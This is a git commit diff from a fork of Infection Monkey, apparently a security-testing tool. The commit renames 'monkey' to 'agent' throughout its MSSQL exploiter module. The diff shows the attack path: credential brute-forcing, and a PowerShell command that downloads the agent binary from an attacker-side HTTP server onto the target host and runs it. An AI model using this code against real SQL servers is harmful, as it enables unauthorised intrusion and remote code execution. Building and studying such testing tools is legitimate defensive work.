p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Replace references to "monkey" with "agent" in MSSQLExploiter

This commit is contained in:
Mike Salvatore 2022-06-14 14:35:28 -04:00
parent 79fbd8b600
commit 7aca587964
1 changed files with 22 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -33,7 +33,7 @@ class MSSQLExploiter(HostExploiter):
# Single quotes are escaped in SQL by using two of them. # Single quotes are escaped in SQL by using two of them.
# Example: 'It ain''t over ''til it''s over' # Example: 'It ain''t over ''til it''s over'
MONKEY_DOWNLOAD_COMMAND = ( AGENT_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
) )
@ -45,7 +45,7 @@ class MSSQLExploiter(HostExploiter):
self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
monkey_path_on_victim = get_agent_dst_path(self.host) agent_path_on_victim = get_agent_dst_path(self.host)
# Brute force to get connection # Brute force to get connection
creds = generate_identity_secret_pairs( creds = generate_identity_secret_pairs(
@ -67,8 +67,8 @@ class MSSQLExploiter(HostExploiter):
try: try:
self._create_temp_dir() self._create_temp_dir()
self._upload_monkey(monkey_path_on_victim) self._upload_agent(agent_path_on_victim)
self.run_monkey(monkey_path_on_victim) self.run_agent(agent_path_on_victim)
self._remove_temp_dir() self._remove_temp_dir()
except Exception as e: except Exception as e:
error_message = ( error_message = (
@ -148,17 +148,17 @@ class MSSQLExploiter(HostExploiter):
mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}" mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}"
self._run_mssql_command(mkdir_command) self._run_mssql_command(mkdir_command)
def _upload_monkey(self, monkey_path_on_victim: PureWindowsPath): def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
http_thread = self._start_monkey_server(monkey_path_on_victim) http_thread = self._start_agent_server(agent_path_on_victim)
self._write_download_command_to_batch_file(monkey_path_on_victim) self._write_download_command_to_batch_file(agent_path_on_victim)
self.run_payload_file() self.run_payload_file()
MSSQLExploiter._stop_monkey_server(http_thread) MSSQLExploiter._stop_agent_server(http_thread)
def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath): def _write_download_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath):
agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) http_path=self.agent_http_path, dst_path=str(agent_path_on_victim)
) )
self._write_command_to_batch_file(agent_download_command) self._write_command_to_batch_file(agent_download_command)
@ -177,32 +177,32 @@ class MSSQLExploiter(HostExploiter):
def run_payload_file(self): def run_payload_file(self):
self._run_mssql_command(str(self.payload_file_path)) self._run_mssql_command(str(self.payload_file_path))
def run_monkey(self, monkey_path_on_victim: PureWindowsPath): def run_agent(self, agent_path_on_victim: PureWindowsPath):
self._write_agent_launch_command_to_batch_file(monkey_path_on_victim) self._write_agent_launch_command_to_batch_file(agent_path_on_victim)
self.run_payload_file() self.run_payload_file()
def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim): def _write_agent_launch_command_to_batch_file(self, agent_path_on_victim):
agent_launch_command = self._get_monkey_launch_command(monkey_path_on_victim) agent_launch_command = self._build_agent_launch_command(agent_path_on_victim)
self._write_command_to_batch_file(agent_launch_command) self._write_command_to_batch_file(agent_launch_command)
def _get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath):
monkey_args = build_monkey_commandline( agent_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, agent_path_on_victim
) )
return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}" return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
def _remove_temp_dir(self): def _remove_temp_dir(self):
self._run_mssql_command(f"del {self.payload_file_path}") self._run_mssql_command(f"del {self.payload_file_path}")
self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}") self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}")
def _start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_repository self.host, str(agent_path_on_victim), self.agent_repository
) )
return http_thread return http_thread
@staticmethod @staticmethod
def _stop_monkey_server(http_thread): def _stop_agent_server(http_thread):
http_thread.stop() http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT) http_thread.join(LONG_REQUEST_TIMEOUT)